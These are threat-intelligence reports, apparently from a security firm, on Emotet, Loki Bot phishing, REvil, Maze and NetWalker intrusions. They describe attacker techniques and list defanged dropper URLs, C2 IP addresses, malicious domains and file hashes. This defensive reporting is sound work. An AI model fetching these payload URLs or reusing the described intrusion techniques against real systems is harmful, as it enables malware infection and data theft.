Figure 3 – decoded and partially deobfuscated powershell script reveals the dropper URLs (highlighted)

This first stage payload, which can have different names in different samples analysed, is by default saved in %TEMP%\APPDATA or USERFOLDER. When the first stage executable is run it gains persistence by copying itself in the system root folder with a different name, and by modifying registries entries to ensure that the process is run every time the endpoint boots up. The new executable in system root is the actual Emotet payload, named kbdrost.exe, and reaches out to a command and control server via a HTTP post request.

Figure 4 – Emotet’s connection to remote C2 IP following successful infection

According to previously observed behaviour, Emotet will eventually drop the Trickbot or Qakbot trojans, which will then deliver the Ryuk or Prolock ransomware respectively.

Emotet’s large spam campaigns and relatively sophisticated delivery mechanisms are likely to continue to pose a threat to companies in Asia Pacific in the foreseeable future. DarkLab’s discovery of Emotet’s targeting of Hong Kong organisations shows how companies in the region should maintain awareness of global threat trends to ensure effective network defences and a proactive approach to cyber security.

Indicators of Compromise

The following IOCs relate to the samples analysed, include the hardcoded C2 IP addresses. However, Emotet’s attack infrastructure changes rapidly. We suggest readers to refer to Cryptolaemus’ daily IOC lists for an updated and comprehensive overview of Emotet’s infrastructure.

FilenameSHA-256 Hash
MJ-1759 report.doc5a378819ab9e17bc93ed9c3d01b31f2b1ff6c39cb3cbaff66933fe096a527450
kbdrost.exe9f9ac55291000f55721ff0fcf8fd421d94eb0e2f0259c161a8d17b2cb0894fa0
Executable dropper URLs
hxxp://haymetetrading[.]com/wp-includes/yGELKj4/
hxxp://simofferbd24[.]com/wp-includes/fsiQc/
hxxp://401kplansinfo[.]com/cgi-bin/KtFRk/
hxxp://fidelityguide[.]com/cgi-bin/VA/
hxxp://sirnakmidyeci[.]com/wp-includes/qk9wW2/
hxxp://subitocarne[.]com/wp-content/ByeOAt9/
hxxp://eliesalibaarchitect[.]com/wordpress/T/

C2 IPs

24.43.32.186:80176.111.60.55:8080121.124.124.40:708075.139.38.211:80
38.111.46.46:808024.137.76.62:8089.216.122.92:8082.225.49.121:80
134.209.36.254:808037.187.72.193:808082.80.155.43:80123.176.25.234:80
162.241.242.173:8080110.145.77.103:8047.144.21.12:443194.187.133.160:443
74.120.55.163:80153.137.36.142:8093.147.212.206:8062.30.7.67:443
61.92.17.12:801.221.254.82:80200.123.150.89:443109.74.5.95:8080
219.74.18.66:443195.7.12.8:80121.7.127.163:80203.153.216.189:7080
156.155.166.221:80110.5.16.198:80200.114.213.233:8080187.161.206.24:80
104.131.44.150:8080110.5.16.198:8094.200.114.161:80157.245.99.39:8080
37.139.21.175:8080185.94.252.104:44324.179.13.119:80195.251.213.56:80
94.1.108.190:443104.236.246.93:808084.39.182.7:8071.72.196.159:80
169.239.182.217:808078.24.219.147:808097.82.79.83:80174.102.48.180:443
220.245.198.194:8085.152.162.105:8087.106.136.232:8080181.169.34.190:80
139.99.158.11:44385.105.205.77:80805.196.74.210:8080140.186.212.146:80
91.211.88.52:7080139.59.60.244:80805.196.74.210:8080201.173.217.124:443
62.75.141.82:8079.137.83.50:44324.43.99.75:8042.200.107.142:80
174.45.13.118:8050.91.114.38:80213.196.135.145:8079.98.24.39:8080
137.119.36.33:80172.91.208.86:8094.23.237.171:4435.39.91.110:7080
188.219.31.12:8074.219.172.26:8074.134.41.124:80139.162.108.71:8080
103.86.49.11:808083.169.36.251:808096.249.236.156:44374.208.45.104:8080
104.131.11.150:443153.232.188.106:8095.213.236.64:808061.19.246.238:443
124.41.215.226:80209.141.54.221:8080137.59.187.107:808050.35.17.13:80
78.187.156.31:80168.235.67.138:7080137.59.187.107:808095.179.229.244:8080
104.32.141.43:80139.130.242.43:80137.59.187.107:8080216.139.123.119:80
107.5.122.110:8068.188.112.97:80219.75.128.166:80120.150.60.189:80
87.106.139.101:808087.106.139.101:8080

A tale of two hacks

A case study in structured intelligence analysis

In recent weeks DarkLab helped a large international company conduct a threat hunting exercise in their infrastructure following a network breach.

The initial investigations revealed that threat actors infiltrated the network using legitimate and likely stolen credentials on a Citrix server hosted in a European subordinate of our client. From there, however, the DarkLab team discovered two sets of activities. One led to the exfiltration of large amount of data, another one to the deployment of the REvil ransomware, also known as Sodinokibi. We previously reported on how ransomware operators are increasingly stealing data from their victims to threaten its release if their ransom demands are not met. It seemed therefore possible that the two sets of malicious activities were carried by the same threat actor.

Indeed, the initial entry point was the same, and the stolen data was uploaded to Mega, a popular data hosting site previously used by REvil operators. However, some other aspects of the malicious actions did not add up. For instance, data was exfiltrated weeks after the ransomware was deployed, which would have been inconsistent with previously observed tactics, techniques and procedures (TTPs) of ransomware operators. Also, the activities that led to ransomware deployment and those that ended up stealing data exploited commonly used but different toolsets. While in one incident Cobalt Strike was used as the attacking tool on day one, the other set of activities involved PSExec the day after. Since Cobalt Strike has a Psexec built-in we started doubting whether the two incidents were carried out by the same hacker.

Assessing pieces of conflicting evidence can be messy and potentially lead to the wrong conclusion. In order to analyse existing evidence in an unbiased and objective manner, DarkLab analysts resolved to employ a traditional intelligence analysis technique used by intelligence professionals since the 1960s. Despite its age, the Analysis of Competing Hypothesis (ACH) remains a useful framework to answer difficult questions in a way that removes analyst’s potential biases or misconceptions.

Our analysts created a table like the below, where pieces of evidence are given a credibility and relevance score, before evaluating their consistency with different hypothesis. The hypothesis with the highest score is considered the most likely.

In our case we considered the following hypothesis:

H1: Incident 1 and 2 were carried out by the same attacker

H2: Incident 1 and 2 were carried out by two different attackers

H3 Incident 1 and 2 were carried out by more than two attackers

Fig 1 – ACH table

By considering the evidence collected as consistent (C), not applicable (N), or inconsistent (I) with each of the hypothesis, a final score is calculated. H2 scored the highest
indicating it was clearly the most likely hypothesis. This suggested that indeed different threat actors were separately involved in the ransomware deployment and data exfiltration.

In this way, we were able to use a fact-based, objective analysis of the available intelligence to our advantage in a live threat hunting exercise. In particular, our threat hunting team was able to treat the incidents as separates, with significant implications for their efforts in detecting and mitigating the breaches.

Further details on the incidents

Our forensic investigation identified how the ransomware attack lasted a total of five days, while the threat actor that stole the data was able to remain undetected in the network for almost six weeks. In both cases, the number of hosts compromised was significant and threat actors were able to move across different countries’ networks without being detected.

The REvil operator used the legitimate remote access solution AnyDesk as a backdoor, and eventually deployed the ransomware to over 1000 servers and workstations in Hong Kong and the UK. Ironically, the ransomware interfered with the callbacks the second attacker had already established on 10 machines. All their established call-back connections on the compromised servers were gone after the ransomware attack. They were therefore forced to restart from the initial compromised Citrix server in the UK. From there, they used Cobalt Strike for lateral movement and privilege escalation on multiple accounts in Hong Kong, US, and India. This second attacker collected hundreds of gigabytes of data from different servers, staged them internally, comprossed them, and eventually uploaded them to a Mega cloud server.

Mitigation

The presence of two separate attackers within the network of a large conglomerate indicates the significant challenges that large organisations with tens of thousands of endpoints can face. Deploying standard policies on such a large estate can be challenging, but we strongly suggest organisations to:

  • Enable Multi-Factor Authentication (MFA) for all remote access
  • Enforce strong password policies, proper Active Directory-based mechanisms, or a managed password solution to protect Domain Administrators account
  • Tighten cloud file storage usage, some solutions offer built-in micro segmentations that can help prevent attackers accessing your data
  • Consider employing Managed Detection and Response services to automatically and proactively mitigate threats in a 24/7 manner

Indicators of Compromise

Host-based

FilenameMD5Description
payload.txtf5dd8644b011a6ecaf405ee9bc5c6852Cobalt Strike implant callback
beac.exe500286eaf9eb11b34eb413bb0df5543bCobalt Strike implant callback
55.exe500286eaf9eb11b34eb413bb0df5543bRansomware
Beta.exe90e6ea15ed18005b431e135186d57abfRansomware

Network-based

ValueDescription
82.31.145[.]121Infiltration IP
94.7.101[.]89Infiltration IP
158.174.247[.]194Infiltration IP
212.80.217[.]174Call back IP
51.83.165[.]21Call back IP
fairyschool[.]artC2 domain for baec.exe

Phishing Vessels

Loki Bot campaign targets maritime industry

DarkLab intelligence analysts detected a Loki Bot phishing campaign targeting the maritime and engineering sectors in Europe, Asia and the US from spoofed email addresses of legitimate organisations in Asia.

Figure 1 – Countries of origin of phishing recipients (blue) and legitimate organisations’ spoofed addresses (red)

Recipients of phishing emails – hard to see in the map above – were also located in Singapore.

The earliest phishing email detected dates back to October 2019. However, our previous research indicates that this threat actor is using maritime themes in their phishing campaigns since at least 2018, and is linked to other malware families including Pony.

The 2019 email was sent from a likely compromised subdomain of an Indonesian company and contained a malicious archive (.rar) attachment purportedly pertaining to a purchase order, a common theme of spam emails.

Since then, the actor behind the campaign refocused their phishing lures by spoofing emails of legitimate organisations linked to the maritime industry, and by referring to vessels and other naval themes in their emails.

Figure 2 – Example of phishing email spoofing a Singapore-based shipping company

Figure 3 – Example of phishing email sent to a Switzerland-based maritime consultancy

Some phishing emails showed a good knowledge of the shipping industry, including believable details of existing ships and ports locations.

Figure 4 – Example of phishing email sent to a Japanese shipping company

Figure 4 – Example of phishing email sent to an Italian engineering contractor, purporting to be from a Chinese port authority

For instance, both vessels mentioned in the email above, Glovis Crown and Glovis Splendor, are 200m long cargo ships registered in the Marshall Islands. It remains unclear how criminals managed to obtain such details, although it seems likely that they derive from previously hijacked communications of potentially unrelated victims.

This second wave of phishing emails has been active between February and late June 2020, suggesting the campaign is likely still active.

Phishing emails switched to a malicious Microsoft Excel (.xlsx) attachment containing an exploit for CVE-2017-11882. This vulnerability in Microsoft Equation Editor lets attackers run remote code on a vulnerable machine when the victim opens a document. The exploit has been actively used by multiple cybercriminal groups due to the level of access it grants to the victim machine and the lack of user interaction needed.

Figure 5 – Screenshot of malicious xlsx attachment to email in Figure 4 [MD5: e7bb1284bf0e723b47435b0f70504b3f]

The malicious documents are downloaders for Loki Bot, an information stealer first seen in 2015. The malicious payloads observed, and additional ones found by pivoting on the attack infrastructure, are downloaded from duckdns.org subdomains likely created with domain generation algorithms (DGA).

The payload, Loki Bot, can steal credentials from browsers and email clients, among other programs, and has keylogging capabilities. The malware also sends identifying information about the victim’s hosts to a C2 to inform threat actors of the successful infection.

The current Loki Bot campaign highlights the ongoing threat of commodity malware and widespread phishing to organisations in the maritime and engineering sectors. Although the campaign exploits well-known threat vectors, lack of widespread adoption of anti-spoofing technologies like SPF and DMARC, or their incorrect implementation,  means that criminals can continue sending credible phishing emails apparently from legitimate domains.

Indicators of Compromise

Emails Sender’s IP

103.253.115[.]37

Downloader Domains

russchine2specialplumbingwsdymaterialgh3.duckdns[.]org

chneswealthandorganisationstdy7joppl.duckdns[.]org

12chnesstdywealthandmoduleorganisationrn.duckdns[.]org

chnes14wealthandstdymoduleorganisationoo.duckdns[.]org

chnthreewealthsndy3andreinforcementagenc.duckdns[.]org

20chneswealthandsndymoduleorganisationvz.duckdns[.]org

chnes29sndyqudusisabadassniggainthebba.duckdns[.]org

united32wsdyfrkesokoriorimistreetsjkjd.duckdns[.]org

russchine2sndymapanxmenischangedone14ajb.duckdns[.]org

sndychnesprvlandofglorylandoflifeforle.duckdns[.]org

greenpegheedahatakankeadeshnaajaotawsdy.duckdns[.]org

sndychnesprvlandofglorylandoflifeforle.duckdns[.]org

Payloads

4ae5c9c199377980ebc558d27e7855960c69167138951378666421b9b3db09de

bcc826091ec71230947aa1916263434935a58ffe5977cf415b1d970633939652

58e0c4eef4236380167e9ea679e7885aebb5319dd0ea17365b90b5867cae7ff8

49107c228e38638d3b241bb5c4aa93ef68db20cc0c5a4157e00fc027635418bf

9ea2966982206d42cd8ad215f7a408bf7c1964134e3bef967e7bb93df6dc1f1a

b48f93828a970b7f2122b098cade1e1ab488ef557cf11ae0c44f5690f6c45185

83ba255722d5c337ce128b5e216fc1a4010849b3b4ac3e4841458d371ed757d6

Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminals’ innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors will likely be driven to explore new ways to differentiate their offering in the illicit cybercriminal market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers emerged with new a tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims to first shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so they may differ in the attack tactics exploited. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter cybercriminal candidate screening is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly more likely entry points than untargeted phishing emails.

The rise of crypt and leak

Since the end 2019, some ransomware groups have begun threatening to release sensitive victim’s data if their ransomware demand are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or on tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.

Maze

Maze ransomware appeared in May 2019, but it began leaking victim’s data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up tor hidden service counterpart to avoid take down by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site

NetWalker

NetWalker ransomware is based on a previous variant called Mailto and was rebranded in its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have gained millions of US dollars since March, although it remains unclear whether this is just an exaggeration to attract more affiliates to their program or not.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from their website overtime, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site, more have likely been targeted and not posted online or deleted from existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and Ransomware exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high profile targets, including by Sodinokibi against Travelex in January.

In both cases, the remote access technology SSLVPN was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers would conduct enumeration and other reconnaissance activities by, for instance, searching for password files in share folders. The attackers will also actively look for idle and vulnerable servers with intentions to expand their foothold.

During our investigations we found that both intruders used common hacking tools, although with some differences. Tools observed include windows administration tools like psexec, open source tools for lateral movement like crackmapexec, PowerShell versions of Mimikatz and PowerView for credential theft, further enumeration and privilege escalation, as well as off-the-shelf network scanners. 

The Maze and NetWalker operators eventually managed to obtain access to administrator accounts, which allowed them in both cases to disable anti-virus solutions on network end points. Similarly, creation of new domain administrator accounts allowed them persistence on the network. 

From such privileged positions the operators staged malware and other required artefacts on accessible locations in the victims’ networks, such as shared folders – for NetWalker – and NETLOGON folders – for Maze. We suspect that in both incidents scripts were used to automatically spread the ransomware in the network.

In the case of Maze, the deployment script would also disable endpoints’ protection software, and enable services, such as Windows Remote Management, that would allow re-entry. Maze operators also abused group policy objects (GPOs) to weaken their endpoint defences by changing configurations, and to redeploy the malware to new machines. The latter would ensure that the ransomware would also spread to endpoints after they shut down or if they joined the network at a later time.

Conclusion

The double extortion of crypt and leak groups and the growing trend of targeted attacks against external network infrastructure makes ransomware leaks one of the most significant threats to companies, regardless of sectors. The recent targeting of Hong Kong organisations by Maze and NetWalker also reaffirms how the SAR’s threat landscape is closely associated with threat trends worldwide.

Companies in Hong Kong should therefore adopt a proactive approach to review their security posture and avoid targeted network intrusions in the first place. Presence of timely back-ups can help restore system availability but it is not an effective mitigation against the increasing threat of ransomware data leak. Organisations should also focus on maintaining situational awareness on developments in the global threat landscape, as threats to companies abroad are likely to quickly become threats to Hong Kong organisations too.

Indicators of Compromise

HashFile nameDescription
c45ebccb7dc2bbc34c51c82c3eba6448apply.ps1Generates GPO package to disable AV, settings
16b5ddd25bb610270e52c1663931ef4csystem.dllMaze ransowmare
0e7d5d16e03393605f5f4862f1b9cc37crackmapexec.exeLateral movement tool
d6a246a98a0387e2a5f9d95ddd8ae164syspool.exeLightweight network scanner
696bb8648eceaa187cbc1f06205a23cecity.exeNetWalker ransomware
84ddf23d4307b1a9989352f4845d0edecity.ps1NetWalker PowerShell script